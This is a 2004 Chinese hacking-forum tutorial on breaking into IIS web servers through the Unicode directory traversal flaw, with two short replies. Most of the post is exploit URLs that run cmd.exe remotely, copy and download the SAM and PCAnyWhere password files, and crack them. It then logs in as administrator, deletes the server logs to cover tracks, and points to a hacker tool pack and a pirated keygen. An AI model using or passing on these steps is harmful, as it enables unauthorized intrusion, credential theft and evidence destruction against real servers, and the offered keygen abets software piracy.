论坛: 菜鸟乐园 标题: 一步一步教您用unicode漏洞入侵网站 复制本贴地址    
作者: newmyth21 [newmyth21]    论坛用户   登录
一步一步教您用unicode漏洞入侵网站

这个漏洞分四种,每一种针对不同语系的系统。分为:%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c,中文简体里面没有这种字,照正常的情况根据内码转换文件\winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中 c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,好像台湾繁体中文也受此漏洞影响。美国很多主机上也有这个漏洞,大都分是最后一种%c0%9v。好好利用吧,一步一步跟我来!

一、程序的实现
如果您对一个一个键打入命令不感兴趣的话,您可以直接看第二部分的工具篇,但我建议您还是看一看,使用工具也要用到一些命令的,我尽可能讲得通俗易懂一点。

假设你已经扫描到某台主机xxx.xxx.xxx.xxx有unicode漏洞(至于用什么工具扫描,工具篇中会讲到)打开你的浏览器,键入:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

+在这里的意思是空格,也就是说这个命令在本机DOS下是:dir c:(列出远程主机C:\下的所有文件)
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\autoexec.bak

这个命令在本机DOS下是:copy c:\autoexec.bat c:\autoexec.bak(也就是复制远程主机C盘下的autoexec.bat并改名为autoexec.bak)
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\autoexec.bak

这个命令在本机DOS下是: del c:\autoexec.bak(也就是删除远程主机C盘下的autoexec.bak)

接下来的工作就是要把这台服务器NT的密码文件拷贝到网站目录下,为什么要拷贝到网站目录下呢?你有权限下载啊,笨~~~!!!

这又分两种情况,一种是直接用NT管理的机器,它的密码文件是sam._,另一种是用赛门铁克的远程管理软件PCAnyWhere进行远程管理,它的密码文件是*.cif,其实两种密码文件取得的方式都相同,只是得到密码后控制的方式不同罢了。

需要知道网站目录,可以通过ida、idq漏洞进行得到,也可以去寻找网站中的一个图片文件,比如Tscontent.gif文件,然后去查找该文件:使用命令 dir c:\ Tscontent.gif /s,知道目录后,比如为c:\inetpub\wwwroot\,接下来
1、sam._的文件的取得
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\repair\sam._+c:\inetpub\wwwroot\

看懂了吗?把c:\winnt\repair下的sam._复制到c:\inetpub\wwwroot\
接下来,http://xxx.xxx.xxx.xxx/sam._ ,把sam._下载到本地

2、*.cif的取得 http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\*.cif+/s

这是搜索C盘下的cif文件,通常找出来的有Citempl.cif和另一个什么名字的cif文件,一般Citempl.cif为系统默认的密码文件,因此我们需要后者,例如叫SA.CIF,它所在目录为c:\Program Files\pcANYWHERE\DATA,执行: http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\Program Files\pcANYWHERE\DATA\SA.CIF+c:\inetpub\wwwroot\


把c:\Program Files\pcANYWHERE\DATA下的SA.CIF复制到c:\inetpub\wwwroot\


接下来,http://xxx.xxx.xxx.xxx/SA.CIF ,把SA.CIF下载到本地

重要的一点是下载完毕以后记住把c:\inetpub\wwwroot\sam._或c:\inetpub\wwwroot\SA.CIF给删掉,清除你的痕迹!

得到密码文件后
1、sam._文件
sam._的文件的破解工具叫L0phtCrack,工具篇会详细提到,这里就不多说了。执行L0phtCrack并得到Nt Password,比如说是123456,执行:C:\>newletmein \\xxx.xxx.xxx -admin

扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$123456 /user:asdfghjk 成功联上对方主机,大功告成!现在你就是root的身份了,为所欲为吧,兄弟!

2、*.cif
*.cif的文件的破解工具叫pcanywherepwd,工具篇会详细提到,这里就不多说了。执行pcanywherepwd并得到PCAnyWhere Password,启动PCAnyWhere登陆主机,又一个管理员出现了,呵呵!

最后记住一点,NT存放日志的目录在:winnt\system32\logfiles,记住毁尸灭迹!

二、工具篇
以下所以工具均能在雨汐网站 http://rainxi.yeah.net/ 的黑客工具中的 unicode完全工具包里找到!(本地下载)

前面我们提到了有工具可以扫描出那些主机有UNICODE漏洞,这个工具叫UNICODE漏洞扫描仪,能扫描指定网段内有UNICODE漏洞的主机,在工具包里为unicode_scanner.zip。界面如图:


很简单吧,填入你想扫描的起始IP和结束IP,让它慢慢扫吧。扫描速度的数值不要填太大,否则很容易出错。

在程序实现篇里讲了那么多难记的命令,您是不是快记不住了,不要紧,DOS您会用吧?下面出场的这个工具叫unicode,它能远程利用unicode漏洞执行类似DOS命令,在工具包里为unicode.zip。界面如图:


在菜单“File”中选择“Connect...”,在弹出的窗口中分别填入所要连接主机的IP和Excute类型,A、B、C、D分别对应%c1%1c、%c0%cf、%c1%pc、%c0%9v。然后OK,然后键入DOS命令,就像操作本机一样简单。

接下来介绍的是两种密码文件的破解工具
1、sam._文件
开始说到了sam._的文件的破解工具叫L0phtCrack,在工具包里为lc252.zip,它的注册机为cr_cllck2.zip,界面如图:


菜单“File-Import SAM File...”,导入sam._文件,菜单“File-Open Password File...”导入字典,菜单“Tools-Run Crack”,开始破解。

大家看到了,实际上这就是一个暴力破解器,要用到字典,时间可能比较长。还有网友来信问我什么是字典,你真是!@#$%,字典是你所猜测密码的组合,格式通常为DIC,TXT,一行一个,破解器会逐行取出测试,直到密码正确和字典用完为止。

这里你可以用本站字典工具中的万能钥匙 ,它是一个符合中国人习惯的字典生成机。生成的字典大小最好不要大于10Mb,要是字典过大可以用分割软件将其分成几个部分。否则容易死机!!!

2、*.cif
开始说到了*.cif的文件的破解工具叫pcanywherepwd,在工具包里为pcanywherepwd.zip,界面如图:


这个工具的使用就更简单了,导入*.cif文件,点Crack,用户名和密码就得到了。

得到密码后的入侵请看上面的程序实现篇!!!对了,赛门铁克的PCAnyWhere9.2我是在它的主页下的,这个软件有19兆多,我是不可能放上来了,大家到赛门铁克的主页去下吧 http://www.symantec.com/ 具体什么位置我就不记得了,太久了,一定能找得到的!另外我送大家PCAnyWhere的注册机,在工具包里为cr_PC Anywhere92.zip,听说这个软件要卖3000多呢,您呐,就偷着乐吧,哈哈哈哈~~~~!!!

以上所提工具包可在雨汐网 http://rainxi.yeah.net/ 的黑客攻击栏目下载,名称为“unicode完全工具包




地主 发表时间: 04-03-23 08:21

回复: newmyth21 [newmyth21]   论坛用户   登录
那个连接偶也不太清楚,原文就是坏的

B1层 发表时间: 04-03-23 08:25

回复: wlbyyh [wlbyyh]   论坛用户   登录
现在还用这个?老啦。都打补丁啦。

B2层 发表时间: 04-03-23 13:17

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号